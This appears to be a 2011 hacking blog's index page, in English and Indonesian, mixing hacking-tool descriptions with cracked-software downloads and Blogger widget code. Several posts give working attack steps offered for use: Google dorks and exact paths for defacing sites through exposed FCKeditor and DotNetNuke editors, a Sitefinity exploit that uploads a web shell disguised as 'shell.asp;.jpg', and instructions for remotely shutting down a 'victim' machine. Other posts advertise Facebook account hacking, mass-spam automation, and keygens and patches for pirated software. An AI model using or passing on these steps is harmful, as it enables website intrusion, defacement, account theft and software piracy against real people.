Breaking News

Monday, May 30, 2011

Wophcrack


Rainbow tables are really useful when cracking password hashes, One disadvantage of these tables is their size which can get up to tens and even hundreds of gigs.
I really liked the Offensive security Crackpot online hash cracker and  i thought it would  be really nice to have a web interface for my rainbow tables which i can access from web anywhere without having to carry them with me whenever i need them.
When cracking lm/ntlm hashes i really like using Ophcrack which provides a free GUI and CLI software along with  some free and paid tables.
I wrote a quick and dirty PHP based web frontend for Ophcrack called Wophcrack, I must say i am not a programmer and i  am sure this could be done more efficiently and elegantly, anyway…its working fine :) , I thought maybe someone will find it useful so i decided to share it here.

Wophcrack was designed to work on Backtrack 4 R2, Although it can be install on any Linux distribution with some small adjustments, Wophcrack can also easily edited to support Rainbow crack.
Please read the requirements and installation notes before using Wophcrack.
Wophcrack will require some manual code adjustments to suite you environment.

Wophcrack Backtrack Installation

You can download Wophcrack Source Here:
Read more ...

iExploder: A Web Browser Quality Assurance Tester!

If you like to fuzz-force your way into finding vulnerabilities, chances are that you will like iExploder. It is inspired from mangleme another similar tool to find security and reliability problems in web browsers.
It feeds the browser under consideration with bad HTML and CSS code, so as to test its stability and security. It continuously feeds browsers bad data in the hope that they will eventually crash. It has been designed to run for hours, or even days until the browser crashes. iExploder is available as a full-featured browser harness, standalone webserver or CGI script.

A few of its features are:
* Tests all HTML and CSS attributes that Mozilla, Webkit and other browsers support
* Basic fuzzing for media formats (bmp, gif, ico, jng, jpg, ogg, png, snd, svg, tiff, wav, xbm, xpm)
* Very basic DOM manipulation fuzzing via JS
* HTTP header fuzzing
* CSS Selector fuzzing
* Logic, buffer overflow, and format string testing
* An unlimited amount of repeatable tests
* Sequential and random testcase testing, with the ability to resume (sequential only)
* Tools to help isolate which test crashed the browser, as well as locate backtrace information
When we ran it for the first time, we chose Firefox – disabled pop-up blocker – and found a crazy load of pop-ups and messages! This went on for quiet sometime and FF crashed! Only if we could replicate at a time when we were in a better position to analyze the crash properly!
All this tool needs is Ruby and any operating system that supports it! iExploder comes with a random seed generator that can be made to generate different seeds via the config.yaml file.
Just take care that you have cleaned your browser cache before you run your tests!
Download iExploder v1.7.2 (iexploder-1.7.2.tgz) Here
Read more ...

Sqlmap

 SqlMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Features
  • Full support for MySQLOraclePostgreSQLMicrosoft SQL ServerMicrosoft AccessSQLite,FirebirdSybase and SAP MaxDB database management systems.
  • Full support for five SQL injection techniques: boolean-based blindtime-based blinderror-basedUNION query and stacked queries.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate database usersusers' password hashesusers' privilegesusers' roles,databasestables and columns.
  • Automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's getsystem command which include, among others, the kitrap0d technique ( MS10-015)

Download

sqlmap can be downloaded from its SourceForge File List page. It is available in two formats:
Source : http://sqlmap.sourceforge.net/
Read more ...

Sqlninja 0.2.5

Sqlninja 0.2.5 is finally available!! It's been 2 years since the previous release, and in this time I have been working on completely different things (see the FAQ for more info on this). However, there were some things that really needed to be added to this tool, so here are the new features:
  • Upload mode is not limited to files of 64k bytes anymore
  • Uploading files is also *massively* faster
  • Proxy support (it was ***ing time!)
  • Support for token kidnapping (thanks Cesar!)
  • Lots of other minor improvements
The TODO list is not empty yet, and I am already working on 0.2.6 which should be out fairly soon.

Introduction

Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access on the DB? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
Have a look at the flash demo and then feel free to download. It is released under the GPLv2

Features

The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does:
  • Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
  • Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
  • Privilege escalation to sysadmin group if 'sa' password has been found
  • Creation of a custom xp_cmdshell if the original one has been removed
  • Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
  • TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
  • Direct and reverse bindshell, both TCP and UDP
  • DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works) 
  • Evasion techniques to confuse a few IDS/IPS/WAF
  • Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection
  • Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping

Platforms supported

Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
  • Linux
  • FreeBSD
  • Mac OS X
Sqlninja does not run on Windows and I am not planning a port in the near future

Read more ...

Facebook Tool

Facebook Tool
You Can Download Here
Read more ...

Netcut For Windows7

NetCut is a Software that helps you admin your network by purely on ARP protocol . List IP-MAC Table in secs, turn off & On network on any computer on your LAN including any device like router , switcher. Also, netcut can protected user from ARP SPOOF attack
High intimate :Pure ARP protocol kernel.enhenced cut off funcation, that no one can escape from your cut off unless he have netcut installed and with protected funcation enabled.

Easy to use: One click to Protect user Computer Function!!! No one in the network can cut you off with ARP spoof technology anymore .
Effective: one Click to Cut down any computer s network connection to the gateway. 
IYFT:Get all IP addresses of the computers in your LAN(Local Area Network) in Secs
High applicability:Work in office LAN,school LAN,or even ISP LAN 
Have Fun with play the online computer make them online or off line remotely 
Safe: TRACE Free, No one will TRACE out what happen 
and last More Stable,swich-hub or hub or cable lan any Lan use Ethernet
NetCut 2.0.8 is licensed as Freeware for the Windows operating system / platform. NetCut is provided as a free download for all software users (Freeware).

DOWNLOAD:
Download Now

ScreenShots:
Free Download Net Cut for Windows 7
Free Download Net Cut for Windows 7
Read more ...

Facebook Blaster Pro 7.2

So what is a facebook blaster?
FaceBook has become the hottest thing since MySpace and YouTube. In fact many are migrating over to Facebook because MySpace has become SpamSpace.

- More Time ~ Spend time doing what you want because your business runs on autopilot.
- More Money ~ Because your business will be automated, you will be free to focus on marketing, and expansion.
- Freedom ~ Because your business is driven by automated software, you can do what you want, when you want, when you get ready.

FaceBook Blaster Pro is the internets #1 Facebook friend adder marketing software tool. Internet marketers are experiencing a gold rush of web 3.0 FREE advertising to highly targeted leads on the fastest growing social network "Facebook". Facebook Blaster Pro can run your marketing efforts on autopilot because automation is key to your success.

Features
- Auto Mass Friend Requests
- Auto Mass Friend Messages
- Auto Mass Friend Wall Poster
- Auto Mass Friend Poker
- Auto Mass Amber Alerts
- Auto Mass Captcha Bypas


Download Here
Read more ...

MP3 To SWF Converter v3 + Keygen

Download Mp3 to SwF : Here

Download Keygen : Here
Read more ...

Deface dengan FCK Editor

1. Inurl: fckeditor/editor/
2. Inurl:filemanager/connectors/
3. Inurl:connectors/uploadtest.html
4. Powered By OpenCart site:com

setelah kita dapat target dalam hal ini saya anggap sudah dapet target.
misal target kita http://www.site.com/

nah tambahkan di belakang url :  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

menjadi http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

maka akan muncul fasilitas upload ... pilih jenis file menjadi PHP kemudian pilih file deface kan kita ... kemudian tekan tombol upload ...

maka hasilnya akan http://sitec.com/filedefacekankita.html atau http://sitec.com/[ptah]filedefacekankita.html
Read more ...

Sitefinity CMS (ASP.NET) Upload Vulnerability

# Exploit Title: Sitefinity CMS (ASP.NET) Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2 2.0)
# dork : "Sitefinity: Login"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com


####################################################


exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

Upload to # http://site.com/Images/[shell]
Read more ...

Spaw2

Read more ...

Deface Spaw

dork :. inurl:tabid/176/Default.aspx
           inurl:portals/0/
           inurl:providers/htmleditorproviders/fck/fcklinkgallery.aspx

POC  : providers/htmleditorproviders/fck/fcklinkgallery.aspx

seletah keluar

ganti address bar nya dengan script ini javascript:__doPostBack('ctlURL$cmdUpload','')

maka akan muncul tombol browsenya ...
Read more ...

Sunday, May 29, 2011

Membuat Iklan Melayang

Mungkin anda pernah mendengar kta2 iklan melayang pada blog, yaitu seperti yang saya terapkan pada blog saya ini Dan Jika Anda ingin mendapatkan uang dengan menggunakan cara ini, caranya cukup mudah,Ikuti beberapa langkah berikut:
1. Login Ke account Blogger
2. Masuk Ke Tab Rancangan
3. Pilih Elemen Laman/Tata Letak
4. Klik Tambah Gadget (Pilih Html/Javascript)

Lalu Copy Code dibawah ini:

<style type="text/css"> #gb{ position:fixed; top:10px; z-index:+1000; } * html #gb{position:relative;}
.gbcontent{ float:right; border:2px solid #000000; background:#ffffff; padding:10px; } </style> <script type="text/javascript"> function showHideGB(){ var gb = document.getElementById("gb"); var w = gb.offsetWidth; gb.opened ? moveGB(0, 30-w) : moveGB(20-w, 0); gb.opened = !gb.opened; } function moveGB(x0, xf){ var gb = document.getElementById("gb"); var dx = Math.abs(x0-xf) > 10 ? 5 : 1; var dir = xf>x0 ? 1 : -1; var x = x0 + dx * dir; gb.style.top = x.toString() + "px"; if(x0!=xf){setTimeout("moveGB("+x+", "+xf+")", 10);} } </script> <div id="gb"> <div class="gbtab" onclick="showHideGB()"> </div> <div class="gbcontent"> <div style="text-align:right"> <a href="javascript:showHideGB()"> .:[Close][Klik 2x]:. </a> </div> <center>



Letakkan Kode Iklan Anda Di sini


<script type="text/javascript"><!--
zone = "33";
pl = "46865";
shape = "2";
c_border = "FFFFFF";
c_background = "auto";
c_text1 = "0000FF";
c_text2 = "0000FF";
c_text3 = "000000";
c_text4 = "000000";
c_text5 = "000000";
c_text6 = "000000";
c_text8 = "0000ff";
url = "http://www.ppcindo.com";
//--></script>

<script type="text/javascript" src="http://www.ppcindo.com/show.js"></script>
</center>
<script type="text/javascript"> var gb = document.getElementById("gb"); gb.style.center = (30-gb.offsetWidth).toString() + "px"; </script></div></div>
Read more ...

Cara Membuat Scroll Bar Dengan mudah

Scroll bar adalah sebuah kotak yang dapat digulung kekanan atau ke bawah sehingga kita dapat menemukan isi yang tersembunyi. Mungkin anda pernah melihat blog yang penuh dengan isinya yang sangat panjang sehingga memperlambat loading blog tersebut. Supaya blog anda tidak seperti itu, di tips kali ini saya akan menjelaskan cara menghilangkan sesak tersebut dengan membuat scrollbar. Dengan begitu kita bisa menghemat pamakaian ruang blog.caranya adalah letakkan kode diantara kode scroll bar 
Berikut adalah kode untuk membuat scroll bar:
<div style="overflow:auto;width:200px;height:200px;padding:10px;border:1px solid #eee">

LETAKKAN KODE ISI SCROLL BAR DI SINI

</div>

untuk mengubah lebar ganti angka setelah kode width: dengan kemauan anda, dan untuk mengubah panjang ganti angka setelah kode height: dengan kemauan anda.
Read more ...

Saturday, May 28, 2011

Smadav 8.5 + Keygen

Install Smadav 8.5 terlebih dahulu .

 lalu buka keygen smadav8.5

Download Smadav 8.5 Disini

Download Keygen ny Disini

Cara Download :

 Tunggu 5 detik

 Lalu klik gambar skip ad
Read more ...

IDM 6.05 + Patch

Ingin Download Super Cepat ???

 Ini Dia Solusinya : Internet Download Manager 6.05

Silahkan Download IDM 6.05 Disini

              Download Patchnya  Disini
Read more ...

Thursday, May 26, 2011

Domain [dot]com [dot]org [dot]net GRATIS

Domain .COM.NET.ORG bisa Anda dapatkan dengan carapercuma alias gratis. Cara dan syaratnya lumayan relatif  mudah dan simple, Anda tinggal mendaftar dan promosikan Link yang diberikan oleh  freepremiumdomain.com untuk Anda promosikan kembali sampai Anda mempunyai 9 (sembilan) pendatar melaluiAnda untuk mendapatkan  1 (satu) Domaim  dan 16 (enam belas) pendaftar untuk (dua) Domain gratis.


Cara mudahnya adalah :

1. Buka alamat FreePremiunDomain.com di browser Anda,
2. Masukan Email dan Password Anda, -> Centang pada kotak disamping I Agree dan klikregister

Seperti gambar berikut :

3. Setelah register, Anda isikan form dan isi dengan benar. Dilanjutkan klik Register lagi


4. Setelah semuanya selesai, dan anda telah resmi terdaftar di FreePremiunDomain.com


5. Terakhir sekali, akan  muncul gambar seperti di atas. Copy dan promosikan Link anda tersebut, Selesai!!

Anda mau Domain [dot]com gartiss?

Read more ...

Wednesday, May 25, 2011

cara mematikan komputer lain dalam 1 jaringan menggunakan CMD



cara mematikan komputer lain dalam 1 jaringan menggunakan CMD. cara ini sudah banyak di muat di beberapa blog yang saya ketahui :










Langkah-langkahnya..:
1. Buka cmd di komputer anda
2. Ketikan “shutdown -i”
3. Next ntar muncul tuh “remote shutdown dialog”
4. Agan tinggal masukan IP komputer yang mau di matikan. caranya :
- click “add” trus masukan IP korban
..::kalo gak tau IP korban::..
- buka CMD trus ketika “net view”

– muncul dah id komputer yang sedan aktif, tinggal agan ketik lagi ping (id komputer)
>>kita lanjut lagi<<
5. Setelah masukan IP korban, click OK
6. Agan masukin koment tinggal di OK, jadi dah..
7. Lihat expresi korban..


Nb : jangan dilakukan untuk kejahatan, karna saya cuma share pengetahuan saja..
Read more ...

Monday, May 23, 2011

Dapat Duit Dari VirtaPay

Read more ...

Sunday, May 22, 2011

Hacking Facebook

Buka LInk Ini..

Hacker

1. masukan e-mail yang mau di hack
2. masukan nama anda e-mail, dan di nana anda upload.How did you find us (optional): jadi anda jawab Google/Google Crome pokoknx dmna anda pke. kemudian klik Hacking FaceBook
3. masukan code yang di berikan admin kepda anda.

tararararararaaaa maka setelah itu mka anda bsa bukak Fb org yang anda hack.
Read more ...

Friday, May 20, 2011

XCodeExploitScannerMay2011



Update:
[-] 4765 Dorks | 4714 SQLI/LFI/XSS exploit dorks | 51 Webshell dorks
[-] LFI Vuln Warning Detection
[-] Google captcha form to avoid IP address blocked
[-] Google search path help user to change the search path module
Read more ...

Sniff Dengan Cain Able .

Download Cain and Able
This Is Video Tutorial :


Read more ...

Havij v1.14 Advanced SQL Injection Pro Download




Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

What's New?
  • Sybase (ASE) database added.
  • Sybase (ASE) Blind database added.
  • Time based method for MsSQL added.
  • Time based method for MySQL added.
  • mod_security bypass added.
  • Pause button added.
  • Basic authentication added
  • Digest authentication added.
  • Post Data field added
  • bugs related with dot character in database name fixed
  • syntax over writing when defined by user in blind injections fixed.
  • mssql database detection from error when using JDBC driver corrected.
  • time out bug in md5 cracker fixed.
  • default value bug fixed
  • string encode bug fixed in PostgreSQL
  • injecting URL rewrite pages added.
  • injecting into any part of http request like Cookie, User-Agent, Referer, etc made available
  • a bug in finding string column fixed. (specially for MySQL)
  • Finding columns count in mysql when input value is non effective added.
  • window resize bug in custom DPI setting fixed.
  • some bugs in finding row count fixed.
  • getting database name in mssql error based when injection type is guessed integer but it's string fixed.

Download Here
Read more ...
Designed By Blogger Templates